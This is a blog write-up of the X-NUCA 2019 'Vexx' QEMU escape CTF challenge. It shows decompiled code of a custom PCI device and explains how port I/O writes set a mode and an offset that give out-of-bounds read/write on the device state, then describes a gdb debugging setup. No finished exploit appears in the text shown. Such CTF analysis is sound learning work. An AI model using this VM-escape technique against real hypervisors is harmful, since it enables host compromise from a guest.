<!doctype html>



  



    
  

<html class="theme-next logos use-motion" lang="zh-hk">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.useso.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Hexo, NexT">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0">






<meta name="description" content="生活，总是在理所当然的挫折与不期而遇的惊喜之间变得层次分明。  This was my first time to finish a “Real-world” style challenge in CTF game. Having so much fun on this Qemu escape challenge, I learned a lot about how Linux drivers">
<meta property="og:type" content="article">
<meta property="og:title" content="[X-NUCA 2019] Vexx - Qemu Escape">
<meta property="og:url" content="http://matshao.com/2019/08/27/X-NUCA-2019-Vexx-Qemu-Escape/index.html">
<meta property="og:site_name" content="Mid Station">
<meta property="og:description" content="生活，总是在理所当然的挫折与不期而遇的惊喜之间变得层次分明。  This was my first time to finish a “Real-world” style challenge in CTF game. Having so much fun on this Qemu escape challenge, I learned a lot about how Linux drivers">
<meta property="og:locale" content="zh-hk">
<meta property="og:updated_time" content="2019-08-27T01:26:38.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="[X-NUCA 2019] Vexx - Qemu Escape">
<meta name="twitter:description" content="生活，总是在理所当然的挫折与不期而遇的惊喜之间变得层次分明。  This was my first time to finish a “Real-world” style challenge in CTF game. Having so much fun on this Qemu escape challenge, I learned a lot about how Linux drivers">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Logos',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://matshao.com/2019/08/27/X-NUCA-2019-Vexx-Qemu-Escape/">





  <title> [X-NUCA 2019] Vexx - Qemu Escape | Mid Station </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-hk">

  





<script>
  	var _mtac = {};
  	(function() {
  		var mta = document.createElement("script");
  		mta.src = "http://pingjs.qq.com/h5/stats.js?v2.0.4";
  		mta.setAttribute("name", "MTAH5");
  		mta.setAttribute("sid", "500688563");
  		var s = document.getElementsByTagName("script")[0];
  		s.parentNode.insertBefore(mta, s);
  	})();
</script>





  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="header-logos"> 
      <div class="site-meta ">
  
    <div class="site-meta-headline">
      <a href="/">
        <img class="custom-logo-image" src="/images/logo_light.png" alt="Mid Station">
      </a>
    </div>
  

  <div class="custom-logo-site-title">
    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Mid Station</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
    
      <p class="site-subtitle"></p>
    
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首頁
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            歸檔
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            關於
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 
            
      </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
  <link itemprop="mainEntityOfPage" href="http://matshao.com/2019/08/27/X-NUCA-2019-Vexx-Qemu-Escape/">

  <span style="display:none" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="name" content="Matthew Shao">
    <meta itemprop="description" content>
    <meta itemprop="image" content="/images/avatar.gif">
  </span>

  <span style="display:none" itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Mid Station">
    <span style="display:none" itemprop="logo" itemscope itemtype="http://schema.org/ImageObject">
      <img style="display:none;" itemprop="url image" alt="Mid Station" src="/images/logo_light.png">
    </span>
  </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                [X-NUCA 2019] Vexx - Qemu Escape
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">發表於</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-08-27T09:08:12+08:00">
                2019-08-27
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分類於</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Hack/" itemprop="url" rel="index">
                    <span itemprop="name">Hack</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          

          
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote>
<p>生活，总是在理所当然的挫折与不期而遇的惊喜之间变得层次分明。</p>
</blockquote>
<p>This was my first time to finish a “Real-world” style challenge in CTF game. Having so much fun on this Qemu escape challenge, I learned a lot about how Linux drivers work with the low-level devices when solving this challenge. Our team stands on the fifth place at the end. See you at Shenzhen by the end of 2019!</p>
<p>You can download the challenge zip file from this link: <a href="https://drive.google.com/file/d/1YJPumonM6ZC9biulWESBJTF7Dkxb_GI-/view?usp=sharing" target="_blank" rel="noopener">vexx.zip</a>. The login username is <code>root</code>, and password is <code>goodluck</code>. If you want to learn virualization related pwning topic, I believe this will be a good starting point.<br><a id="more"></a></p>
<h2 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h2><p>The structure of the provided archive file looks like this:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">.</span><br><span class="line">├── bzImage</span><br><span class="line">├── initramfs</span><br><span class="line">├── launch.sh</span><br><span class="line">├── pc-bios</span><br><span class="line">├── qemu-system-x86_64</span><br><span class="line">└── rootfs.ext2</span><br></pre></td></tr></table></figure></p>
<p>Let’s see what  <code>launch.sh</code> tells us:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line">./qemu-system-x86_64 -hda rootfs.ext2 -kernel bzImage -m 64M -append <span class="string">"console=ttyS0 root=/dev/sda oops=panic panic=1"</span> -L ./pc-bios -netdev user,id=mynet0 -device rtl8139,netdev=mynet0 -nographic -device vexx -snapshot</span><br></pre></td></tr></table></figure></p>
<p>I can tell two suspicious terms at the first glaze, the first one is <code>-L ./pc-bios</code>, it tells us this is used to set the directory for the BIOS, VGA BIOS and keymaps in <code>--help</code> command. The second unusual term is <code>-device vexx</code>, it seems like the designer implemented a custom device, so this is very likely the correct place to look for vulnerabilities.<br>After running <code>launch.sh</code> and login as it suggested. it gives us a root shell.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Welcome to VM world!</span><br><span class="line">NeSE login: root</span><br><span class="line">Password: </span><br><span class="line"># id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root),10(wheel)</span><br></pre></td></tr></table></figure></p>
<p>So this challenge assumes we have full control of the guest system and our target is reading the flag file from the host machine. My teammate suggested some Qemu escape writup from previous CTFs: <a href="https://kitctf.de/writeups/hitb2017/babyqemu" target="_blank" rel="noopener">HITB GSEC 2017: babyqemu</a>, <a href="https://uaf.io/exploitation/2018/11/22/Hitb-2017-babyqemu.html" target="_blank" rel="noopener">Hitb 2017 - Babyqemu</a>. The writeups pointed out that the custom devices code is located in the emulator binary file. The provided emulator is <code>version 4.0.0</code>, so I downloaded the corresponding source and compiled it. Then I feed them to <code>bindiff</code> and see the modifications. Sorting the functions by difference, soon we can see a function called <code>vexx_mmio_write</code>. Well, seems this is it, if we search the string “vexx” in function window, there are more related functions.</p>
<p>As suggested by previous writeups, first we can easily found the device state structure in Local Types window.<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">VexxState</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  PCIDevice_0 pdev;</span><br><span class="line">  MemoryRegion_0 mmio;</span><br><span class="line">  MemoryRegion_0 cmb;</span><br><span class="line">  PortioList_0 port_list;</span><br><span class="line">  QemuThread_0 thread;</span><br><span class="line">  QemuMutex_0 thr_mutex;</span><br><span class="line">  QemuCond_0 thr_cond;</span><br><span class="line">  <span class="keyword">_Bool</span> stopping;</span><br><span class="line">  <span class="keyword">uint32_t</span> addr4;</span><br><span class="line">  <span class="keyword">uint32_t</span> fact;</span><br><span class="line">  <span class="keyword">uint32_t</span> status;</span><br><span class="line">  <span class="keyword">uint32_t</span> irq_status;</span><br><span class="line">  <span class="keyword">uint32_t</span> memorymode;</span><br><span class="line">  VexxRequest req;</span><br><span class="line">  VexxDma vexxdma;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
<p>and its related strutures:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">VexxRequest</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="keyword">uint32_t</span> state;</span><br><span class="line">  <span class="keyword">uint32_t</span> offset;</span><br><span class="line">  <span class="keyword">char</span> req_buf[<span class="number">256</span>];</span><br><span class="line">&#125;;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">VexxDma</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  <span class="keyword">uint32_t</span> state;</span><br><span class="line">  dma_state dma;</span><br><span class="line">  QEMUTimer_0 dma_timer;</span><br><span class="line">  <span class="keyword">char</span> dma_buf[<span class="number">4096</span>];</span><br><span class="line">  <span class="keyword">uint64_t</span> dma_mask;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
<p>Thanks to the debug symbols, these look pretty readable. Then we can start investing the code from <code>vexx_class_init</code>:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">vexx_class_init</span><span class="params">(ObjectClass_0 *a1, <span class="keyword">void</span> *data)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  PCIDeviceClass *pdev; <span class="comment">// rbx</span></span><br><span class="line">  PCIDeviceClass *v3; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  pdev = (PCIDeviceClass *)object_class_dynamic_cast_assert(</span><br><span class="line">                             a1,</span><br><span class="line">                             (<span class="keyword">const</span> <span class="keyword">char</span> *)&amp;implements_type,</span><br><span class="line">                             <span class="string">"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c"</span>,</span><br><span class="line">                             <span class="number">549</span>,</span><br><span class="line">                             <span class="string">"vexx_class_init"</span>);</span><br><span class="line">  v3 = (PCIDeviceClass *)object_class_dynamic_cast_assert(</span><br><span class="line">                           a1,</span><br><span class="line">                           <span class="string">"pci-device"</span>,</span><br><span class="line">                           <span class="string">"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c"</span>,</span><br><span class="line">                           <span class="number">550</span>,</span><br><span class="line">                           <span class="string">"vexx_class_init"</span>);</span><br><span class="line">  *(_DWORD *)&amp;v3-&gt;vendor_id = <span class="number">0x11E91234</span>;</span><br><span class="line">  v3-&gt;revision = <span class="number">16</span>;</span><br><span class="line">  v3-&gt;realize = (<span class="keyword">void</span> (*)(PCIDevice_0 *, Error_0 **))pci_vexx_realize;</span><br><span class="line">  v3-&gt;<span class="built_in">exit</span> = (PCIUnregisterFunc *)pci_vexx_uninit;</span><br><span class="line">  v3-&gt;class_id = <span class="number">255</span>;</span><br><span class="line">  pdev-&gt;parent_class.categories[<span class="number">0</span>] |= <span class="number">0x80</span>uLL;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>This function specified the <code>vendor_id</code> at line 18, and it registered the realize function and exit function. So we can follow up to realize function <code>pci_vexx_realize</code>:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">pci_vexx_realize</span><span class="params">(PCIDevice *pdev, Error_0 **errp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  VexxState *state; <span class="comment">// rbx</span></span><br><span class="line">  MemoryRegion_0 *v3; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  state = (VexxState *)object_dynamic_cast_assert(</span><br><span class="line">                         &amp;pdev-&gt;qdev.parent_obj,</span><br><span class="line">                         <span class="string">"vexx"</span>,</span><br><span class="line">                         <span class="string">"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c"</span>,</span><br><span class="line">                         <span class="number">482</span>,</span><br><span class="line">                         <span class="string">"pci_vexx_realize"</span>);</span><br><span class="line">  pdev-&gt;config[<span class="number">61</span>] = <span class="number">1</span>;</span><br><span class="line">  <span class="keyword">if</span> ( !msi_init(pdev, <span class="number">0</span>, <span class="number">1u</span>, <span class="number">1</span>, <span class="number">0</span>, errp) )</span><br><span class="line">  &#123;</span><br><span class="line">    timer_init_full(</span><br><span class="line">      &amp;state-&gt;vexxdma.dma_timer,</span><br><span class="line">      <span class="number">0L</span>L,</span><br><span class="line">      QEMU_CLOCK_VIRTUAL,</span><br><span class="line">      <span class="number">1000000</span>,</span><br><span class="line">      <span class="number">0</span>,</span><br><span class="line">      (QEMUTimerCB *)vexx_dma_timer,</span><br><span class="line">      state);</span><br><span class="line">    qemu_mutex_init(&amp;state-&gt;thr_mutex);</span><br><span class="line">    qemu_cond_init(&amp;state-&gt;thr_cond);</span><br><span class="line">    qemu_thread_create(&amp;state-&gt;thread, <span class="string">"vexx"</span>, (<span class="keyword">void</span> *(*)(<span class="keyword">void</span> *))vexx_fact_thread, state, <span class="number">0</span>);</span><br><span class="line">    memory_region_init_io(&amp;state-&gt;mmio, &amp;state-&gt;pdev.qdev.parent_obj, &amp;vexx_mmio_ops, state, <span class="string">"vexx-mmio"</span>, <span class="number">0x1000</span>uLL);</span><br><span class="line">    memory_region_init_io(&amp;state-&gt;cmb, &amp;state-&gt;pdev.qdev.parent_obj, &amp;vexx_cmb_ops, state, <span class="string">"vexx-cmb"</span>, <span class="number">0x4000</span>uLL);</span><br><span class="line">    portio_list_init(&amp;state-&gt;port_list, &amp;state-&gt;pdev.qdev.parent_obj, vexx_port_list, state, <span class="string">"vexx"</span>);</span><br><span class="line">    v3 = pci_address_space_io(pdev);</span><br><span class="line">    portio_list_add(&amp;state-&gt;port_list, v3, <span class="number">0x230</span>u);</span><br><span class="line">    pci_register_bar(pdev, <span class="number">0</span>, <span class="number">0</span>, &amp;state-&gt;mmio);</span><br><span class="line">    pci_register_bar(pdev, <span class="number">1</span>, <span class="number">4u</span>, &amp;state-&gt;cmb);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>From line 26~30 is what really matters here. Line 26 and 27 share the same pattern, in short,it  initializes two memory region for memory-mapped I/O, and bind corresponding operations functions to them. Line 28~30 initialize another I/O method. It defines a range of I/O port numbers for specified operations. </p>
<h2 id="Vulnerabilites"><a href="#Vulnerabilites" class="headerlink" title="Vulnerabilites"></a>Vulnerabilites</h2><h3 id="cmb-mmio"><a href="#cmb-mmio" class="headerlink" title="cmb_mmio"></a>cmb_mmio</h3><p>From     previous chapter we figure out what operations the devices provided to interact with. There are two MMIO region call <code>vexx-mmio</code> and <code>vexx-cmb</code>, and a series of I/O ports from 0x230. Each I/O channel is bound to   read and write methods. Let’s start from <code>vexx_cmb_read</code> and <code>vexx_cmb_write</code>:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int64_t</span> __<span class="function">fastcall <span class="title">vexx_cmb_read</span><span class="params">(VexxState *state, hwaddr addr, <span class="keyword">unsigned</span> <span class="keyword">int</span> size)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">uint32_t</span> memorymode; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">uint64_t</span> result; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  memorymode = state-&gt;memorymode;</span><br><span class="line">  <span class="keyword">if</span> ( memorymode &amp; <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    result = <span class="number">255L</span>L;</span><br><span class="line">    <span class="keyword">if</span> ( addr &gt; <span class="number">0x100</span> )</span><br><span class="line">      <span class="keyword">return</span> result;</span><br><span class="line">    LODWORD(addr) = state-&gt;req.offset + addr;</span><br><span class="line">    <span class="keyword">goto</span> LABEL_4;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( !(memorymode &amp; <span class="number">2</span>) )</span><br><span class="line">  &#123;</span><br><span class="line">    result = <span class="number">255L</span>L;</span><br><span class="line">    <span class="keyword">if</span> ( addr &gt; <span class="number">0x100</span> )</span><br><span class="line">      <span class="keyword">return</span> result;</span><br><span class="line">    <span class="keyword">goto</span> LABEL_4;</span><br><span class="line">  &#125;</span><br><span class="line">  result = <span class="number">255L</span>L;</span><br><span class="line">  <span class="keyword">if</span> ( addr - <span class="number">0x100</span> &gt; <span class="number">0x50</span> )</span><br><span class="line">    <span class="keyword">return</span> result;</span><br><span class="line">  LODWORD(addr) = addr - <span class="number">256</span>;</span><br><span class="line">LABEL_4:</span><br><span class="line">  result = *(_QWORD *)&amp;state-&gt;req.req_buf[(<span class="keyword">unsigned</span> <span class="keyword">int</span>)addr];</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">vexx_cmb_write</span><span class="params">(VexxState *state, hwaddr addr, <span class="keyword">uint64_t</span> val, <span class="keyword">unsigned</span> <span class="keyword">int</span> size)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">uint32_t</span> memorymode; <span class="comment">// eax</span></span><br><span class="line">  hwaddr v5; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  memorymode = state-&gt;memorymode;</span><br><span class="line">  <span class="keyword">if</span> ( memorymode &amp; <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( addr &gt; <span class="number">0x100</span> )</span><br><span class="line">      <span class="keyword">return</span>;</span><br><span class="line">    LODWORD(addr) = state-&gt;req.offset + addr;</span><br><span class="line">    <span class="keyword">goto</span> LABEL_4;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( !(memorymode &amp; <span class="number">2</span>) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( addr &gt; <span class="number">0x100</span> )</span><br><span class="line">      <span class="keyword">return</span>;</span><br><span class="line">    <span class="keyword">goto</span> LABEL_4;</span><br><span class="line">  &#125;</span><br><span class="line">  v5 = addr - <span class="number">256</span>;</span><br><span class="line">  LODWORD(addr) = addr - <span class="number">256</span>;</span><br><span class="line">  <span class="keyword">if</span> ( v5 &lt;= <span class="number">0x50</span> )</span><br><span class="line">LABEL_4:</span><br><span class="line">    *(_QWORD *)&amp;state-&gt;req.req_buf[(<span class="keyword">unsigned</span> <span class="keyword">int</span>)addr] = val;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>The code is neat. These functions basically perform R/W operations on <code>state-&gt;req.req_buf</code>, which is a buffer in size of 0x100. I notice that if we can control <code>state-&gt;memorymode</code> to 1 and <code>state-&gt;req.offset</code> to non-zero value, so we can hit line 11 and perform out-of-bound read/write.</p>
<p>Following this idea, we can find these varibles were initialized in <code>vexx_instance_init</code>:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">vexx_instance_init</span><span class="params">(__int64 obj)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  VexxState *state; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  state = (VexxState *)object_dynamic_cast_assert(</span><br><span class="line">                         (Object_0 *)obj,</span><br><span class="line">                         <span class="string">"vexx"</span>,</span><br><span class="line">                         <span class="string">"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c"</span>,</span><br><span class="line">                         <span class="number">538</span>,</span><br><span class="line">                         <span class="string">"vexx_instance_init"</span>);</span><br><span class="line">  state-&gt;memorymode = <span class="number">4</span>;</span><br><span class="line">  state-&gt;req.offset = <span class="number">0</span>;</span><br><span class="line">  state-&gt;vexxdma.dma_mask = <span class="number">0xFFFFFFF</span>LL;</span><br><span class="line">  object_property_add(</span><br><span class="line">    (Object_0 *)obj,</span><br><span class="line">    <span class="string">"dma_mask"</span>,</span><br><span class="line">    <span class="string">"uint64"</span>,</span><br><span class="line">    (ObjectPropertyAccessor *)vexx_obj_uint64,</span><br><span class="line">    (ObjectPropertyAccessor *)vexx_obj_uint64,</span><br><span class="line">    <span class="number">0L</span>L,</span><br><span class="line">    &amp;state-&gt;vexxdma.dma_mask,</span><br><span class="line">    <span class="number">0L</span>L);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<h3 id="Port-I-O"><a href="#Port-I-O" class="headerlink" title="Port I/O"></a>Port I/O</h3><p>Soon I found that we can control those varialbes through port I/O.<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __<span class="function">fastcall <span class="title">vexx_ioport_write</span><span class="params">(VexxState *opaque, <span class="keyword">uint32_t</span> addr, <span class="keyword">uint32_t</span> val)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">if</span> ( addr - <span class="number">560</span> &lt;= <span class="number">0x20</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">switch</span> ( addr )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">0x240</span>u:</span><br><span class="line">        opaque-&gt;req.offset = val;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">0x250</span>u:</span><br><span class="line">        opaque-&gt;req.state = val;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">0x230</span>u:</span><br><span class="line">        opaque-&gt;memorymode = val;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>Well, the idea is pretty clear now, we can combine these two I/O operations and perform OOB R/W on <code>VexxState</code> object. Right after <code>state-&gt;req.reqbuf</code> is an <code>VexxDma</code> object called <code>vexxdma</code>.</p>
<h2 id="Debugging-setup"><a href="#Debugging-setup" class="headerlink" title="Debugging setup"></a>Debugging setup</h2><p>Remeber that our attack target is Qemu emulator itself, so we can simply attach gdb to the running process, like <code>sudo gdb attach (pidof qemu-system-x86_64)</code>. And we need to copy the exp into the guest machine. My solution here is to mount the provided ext2 file and copy our exp into it, then lauch the virtual machine again.<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo mount ./rootfs.ext2 ./rootfs -t ext2</span><br><span class="line">sudo cp <span class="variable">$EXP_DIR</span>/bin/release/exp rootfs/exp</span><br><span class="line">sudo umount ./rootfs</span><br></pre></td></tr></table></figure></p>
